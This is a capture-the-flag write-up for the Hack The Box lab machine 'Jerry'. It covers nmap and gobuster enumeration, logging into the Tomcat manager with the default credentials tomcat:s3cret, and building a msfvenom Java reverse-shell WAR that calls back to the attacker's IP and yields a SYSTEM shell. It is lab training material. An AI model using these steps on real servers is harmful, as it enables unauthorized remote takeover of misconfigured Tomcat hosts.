Jerry

info-card
Our initial enumeration doesn't leave much to the imagination here, our quick nmap scan only returns one open port.
nmap -sV 10.10.10.95

Nmap Results
Naturally we assume Tomcat is our target for this box. On tomcat instances, you can reach the management console at
/manage
, but if you didn't know that already, you can find that using gobuster:gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 50

Gobuster Results
For the login we treat it like any other application, google for default credentials. Doing this brought me to a great github repository for default credentials where I found this page. Using the credentials
tomcat:s3cret
from that list gives us access.Looking at the management console, we see something that catches our eye as a path to execution:

WAR Upload Form
Know that we know we can deploy
war
files to the server, we can generate a reverse shell with msfvenom
:msfvenom -p java/shell_reverse_tcp LHOST=$(tunip) LPORT=4443 -f war > evil.war
tunip
is a handy bash alias I use to get my current IP address for Hack The Box. it is set to ifconfig tun0 | sed -n '2 p' | awk '{print \$2}'
in my ~/.bash_aliases
If you happen to work out of a folder shared between your kali VM and windows like I do, windows defender will nuke this file as soon as you generate it. So it's best to do this somewhere else (I just generated it in
/tmp
)After uploading this file we can see it in the list of running applications:

Evil War Application
Clicking on the link to our malicious application triggers the reverse shell. It just happens that Tomcat is run as
nt authority/system
in this case, so we now have full access to the system and are able to read the user and root flags:
User and Root Flags
Last modified 11mo ago